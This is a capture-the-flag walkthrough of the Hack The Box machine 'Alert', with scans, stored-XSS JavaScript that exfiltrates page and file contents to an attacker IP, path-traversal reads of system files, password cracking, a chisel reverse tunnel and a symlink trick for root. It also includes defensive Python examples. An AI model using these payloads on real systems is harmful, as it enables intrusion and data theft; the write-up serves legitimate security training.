HTB Alert - 🐧
Enumeration
```
nmap -sC -sV -Pn -A alert.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 18:43 IST
Nmap scan report for alert.htb (10.10.11.44)
Host is up (0.19s latency).
Not shown: 941 closed tcp ports (conn-refused), 57 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds
```
```
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://alert.htb -H "Host: FUZZ.alert.htb" -ac

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://alert.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.alert.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

statistics              [Status: 401, Size: 467, Words: 42, Lines: 15, Duration: 196ms]
:: Progress: [19966/19966] :: Job [1/1] :: 208 req/sec :: Duration: [0:01:41] :: Errors: 0 ::
```
```
dirsearch -u http://alert.htb

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/d31ty/reports/http_alert.htb/_25-01-01_18-41-00.txt

Target: http://alert.htb/

[18:41:00] Starting:
[18:41:07] 403 -  274B - /.ht_wsr.txt
[18:41:07] 403 -  274B - /.htaccess.sample
[18:41:07] 403 -  274B - /.htaccess.bak1
[18:41:07] 403 -  274B - /.htaccess.save
[18:41:07] 403 -  274B - /.htaccess_extra
[18:41:07] 403 -  274B - /.htaccess.orig
[18:41:07] 403 -  274B - /.htaccess_orig
[18:41:07] 403 -  274B - /.htaccessOLD2
[18:41:07] 403 -  274B - /.htaccessOLD
[18:41:07] 403 -  274B - /.htaccessBAK
[18:41:07] 403 -  274B - /.htaccess_sc
[18:41:07] 403 -  274B - /.htm
[18:41:07] 403 -  274B - /.html
[18:41:07] 403 -  274B - /.htpasswd_test
[18:41:07] 403 -  274B - /.htpasswds
[18:41:08] 403 -  274B - /.httr-oauth
[18:41:10] 403 -  274B - /.php
[18:41:50] 200 -   24B - /contact.php
[18:41:52] 301 -  304B - /css  ->  http://alert.htb/css/
[18:42:16] 301 -  309B - /messages  ->  http://alert.htb/messages/
[18:42:33] 403 -  274B - /server-status/
[18:42:33] 403 -  274B - /server-status
[18:42:44] 301 -  308B - /uploads  ->  http://alert.htb/uploads/
[18:42:44] 403 -  274B - /uploads/
```
```
gobuster dir -u http://alert.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x tar,php,cgi,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://alert.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              tar,php,cgi,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 302) [Size: 660] [--> index.php?page=alert]
/.php                 (Status: 403) [Size: 274]
/contact.php          (Status: 200) [Size: 24]
/uploads              (Status: 301) [Size: 308] [--> http://alert.htb/uploads/]
/css                  (Status: 301) [Size: 304] [--> http://alert.htb/css/]
/messages             (Status: 301) [Size: 309] [--> http://alert.htb/messages/]
/messages.php         (Status: 200) [Size: 1]
```
On the statistics subdomain there is a login page; with wrong credentials the server only returns its error footer:
```
Apache/2.4.41 (Ubuntu) Server at statistics.alert.htb Port 80
```
I found that the .md file uploader is vulnerable to XSS injection. Escalating that XSS to RCE was not achievable, though, as an uploaded .js file is not executed, and as soon as I upload a .js file the share feature is disabled by the server. So at that point I had no leads.
Finding the initial foothold was quite tiring, as I couldn't locate the vulnerable spot. After some time of recon I realised we should create a script that calls back from the .md file and submit its link through the contact page: when we submit, the link gets clicked and executed on the server by the admin.
So first I thought, let's look through /messages:
```html
<script>
var url = "http://alert.htb/index.php?page=messages"
var attacker = "http://10.10.14.108:7890/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
    }
}
xhr.open("GET", url, true)
xhr.send(null)
</script>
```
![[Screenshot 2025-02-11 at 23.13.53.png]]
But again this was not fruitful at all. The index page was not giving any information either, so I tried LFI on it, but that didn't work. Earlier in our gobuster scan we saw a total of 3 PHP requests with 200 status, so I tried the JS payload against each of them one by one.
It succeeded on messages.php:
```html
<script>
var url = "http://alert.htb/messages.php?file=../../../../../../../etc/passwd"
var attacker = "http://10.10.14.108:7890/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
    }
}
xhr.open("GET", url, true)
xhr.send(null)
</script>
```
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
albert:x:1000:1000:albert:/home/albert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
david:x:1001:1002:,,,:/home/david:/bin/bash
```
Found the users david and albert.
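The messages.php?file= flaw above is an unconstrained path join, which is why seven "../" segments land in /etc/passwd. As an added example (not code from the box or this writeup; the directory layout, file names and function names are my assumptions), here is that blind join beside a hardened resolver, exercised on the traversal string used above, an encoded variant, a planted symlink and a legitimate file:

```python
import os
import tempfile
from urllib.parse import unquote

def vulnerable_resolve(base, requested):
    # What messages.php effectively does on the box: the parameter is joined
    # blindly, so "../" segments walk straight out of the messages directory.
    return os.path.normpath(os.path.join(base, requested))

def safe_resolve(base, requested):
    # Hardened form: decode once, refuse NUL bytes and absolute paths, then
    # require the canonical target to remain inside the canonical base.
    # realpath() also neutralises symlinks planted inside the directory that
    # point elsewhere (compare the ln -s /root/root.txt trick later on).
    candidate = unquote(requested)
    if "\x00" in candidate or os.path.isabs(candidate):
        return None
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, candidate))
    # commonpath, not startswith: "/srv/messages2" must not pass for "/srv/messages"
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target

def demo():
    # Constructed layout (an assumption, not the box's real tree): a messages
    # directory with one legitimate file, a secret outside it, and a symlink
    # inside the directory that points at that secret.
    root = tempfile.mkdtemp()
    messages = os.path.join(root, "messages")
    os.mkdir(messages)
    with open(os.path.join(messages, "hello.md"), "w") as f:
        f.write("# hi\n")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("not for www-data\n")
    os.symlink(secret, os.path.join(messages, "link.md"))
    traversal = "../../../../../../../etc/passwd"   # the payload used above
    return {
        "vuln_traversal": vulnerable_resolve(messages, traversal),
        "safe_traversal": safe_resolve(messages, traversal),
        "safe_encoded": safe_resolve(messages, "..%2F..%2Fsecret.txt"),
        "safe_symlink": safe_resolve(messages, "link.md"),
        "safe_legit": safe_resolve(messages, "hello.md"),
        "legit_path": os.path.realpath(os.path.join(messages, "hello.md")),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```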
Then I tried to grab their id_rsa files and /etc/shadow, but with no success.
After some further enumeration of the Apache file system, I figured its configuration might be worth a look, and I did get some useful info from it:
```html
<script>
var url = "http://alert.htb/messages.php?file=../../../../../../../etc/apache2/sites-available/000-default.conf"
var attacker = "http://10.10.14.108:7890/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
    }
}
xhr.open("GET", url, true)
xhr.send(null)
</script>
```
```apache
<VirtualHost *:80>
    ServerName alert.htb
    DocumentRoot /var/www/alert.htb
    <Directory /var/www/alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>
    RewriteEngine On
    RewriteCond %{HTTP_HOST} !^alert\.htb$
    RewriteCond %{HTTP_HOST} !^$
    RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

<VirtualHost *:80>
    ServerName statistics.alert.htb
    DocumentRoot /var/www/statistics.alert.htb
    <Directory /var/www/statistics.alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>
    <Directory /var/www/statistics.alert.htb>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        AuthType Basic
        AuthName "Restricted Area"
        AuthUserFile /var/www/statistics.alert.htb/.htpasswd
        Require valid-user
    </Directory>
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
```
One line in this file caught my eye: AuthUserFile /var/www/statistics.alert.htb/.htpasswd
Reading that file through the same LFI got me the hash of user albert:
```
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
```
For some reason hashcat couldn't be run, so I used john to crack the password:
```
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
Based on the suggestion john printed while running the above command, I used this modified version:
```
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long
```
Cracked the password: manchesterunited (albert)
I used this password to log in over SSH, and boom, I'm in. These credentials also work for logging in to http://statistics.alert.htb, but there is nothing useful to see there. Just another rabbit hole.
Got the user flag: 4f5dac8d20e09c72751b65bdd1890d21
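Before moving on: the vhost config above writes a combined-format access.log, which is where the foothold requests from this writeup would show up as hits on messages.php with traversal in the file parameter. As an added example (not code from the box or this writeup; the log lines are constructed and the function names are mine), a small parser over such lines that flags any query parameter trying to leave the web tree, including double-encoded variants:

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format, as configured by the CustomLog lines above.
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def suspicious_params(target):
    # Return (name, decoded value) for every query parameter whose value tries
    # to leave the web tree: "../" segments, an absolute path, or a NUL byte.
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; this catches double encoding
        if ("../" in decoded or "..\\" in decoded
                or decoded.startswith("/") or "\x00" in decoded):
            hits.append((name, decoded))
    return hits

def scan(lines):
    # One finding per suspicious parameter, with enough context to pivot on.
    findings = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue
        for name, value in suspicious_params(m["target"]):
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "path": urlsplit(m["target"]).path,
                             "param": name, "value": value,
                             "status": m["status"]})
    return findings

# Constructed sample lines (not real logs from the box), shaped like the
# requests this writeup makes: two traversal reads and two benign requests.
SAMPLE_LOG = [
    '127.0.0.1 - - [11/Feb/2025:23:10:01 +0000] "GET /messages.php?file=../../../../../../../etc/passwd HTTP/1.1" 200 2011 "http://alert.htb/index.php?page=messages" "Mozilla/5.0"',
    '127.0.0.1 - - [11/Feb/2025:23:10:02 +0000] "GET /messages.php?file=..%2F..%2Fetc%2Fapache2%2Fsites-available%2F000-default.conf HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '10.10.14.108 - - [11/Feb/2025:23:09:50 +0000] "GET /index.php?page=messages HTTP/1.1" 200 660 "-" "Mozilla/5.0"',
    '10.10.14.108 - - [11/Feb/2025:23:09:55 +0000] "GET /messages.php?file=2025-02-11.txt HTTP/1.1" 200 1 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```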
Priv Escalation
Ran linpeas.sh.
No SUID binaries that looked useful.
According to linpeas the box is vulnerable to CVE-2021-3560, but that didn't work.
/opt/website-monitor/.git => this seemed interesting.
linpeas also printed the hostname, /etc/hosts and resolver configuration below (statistics.alert.htb resolves locally), so I ran ss -lntp to see what's listening locally:
```
alert
127.0.0.1 localhost
127.0.1.1 alert
127.0.0.1 alert.htb
127.0.0.1 statistics.alert.htb

::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

nameserver 127.0.0.53
options edns0 trust-ad
```
```
albert@alert:/tmp$ ss -lntp
State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port  Process
LISTEN  0       4096         127.0.0.1:8080        0.0.0.0:*
LISTEN  0       4096     127.0.0.53%lo:53          0.0.0.0:*
LISTEN  0       128            0.0.0.0:22          0.0.0.0:*
LISTEN  0       511                  *:80                *:*
LISTEN  0       128               [::]:22             [::]:*
albert@alert:/tmp$
```
Chisel commands (server on the attacking host, client on the box):
```
chisel server --socks5 --reverse -p 4567
```
```
./chisel client --fingerprint Ung4PysNZn6IJAZ1Qsu7+ursZ3TqFKVomWv5AhhRA9I= 10.10.14.45:4567 R:1234:127.0.0.1:8080
```
![[Screenshot 2025-02-13 at 15.45.47.png]]
![[Screenshot 2025-02-13 at 15.46.02.png]]
broke.lol and neatnik are the services found there => another rabbit hole.
![[Screenshot 2025-02-13 at 15.52.57.png]]
![[Screenshot 2025-02-13 at 15.51.16.png]]
Then it seems we could symlink the path:
```
ln -s /root/root.txt root.txt
```
Then we could read the root file in the browser. I found this method on the internet, though, and was not fully satisfied with it. Then I noticed that the other user group, management, has write access in the /opt folder, so a simple reverse shell worked to gain root access.
![[Screenshot 2025-02-13 at 15.55.55.png]]
![[Screenshot 2025-02-13 at 15.56.38.png]]
![[Screenshot 2025-02-13 at 15.57.39.png]]
![[Screenshot 2025-02-13 at 15.57.27.png]]
Root flag: 54b6fcbaa0c2c5143efcf9674080a63f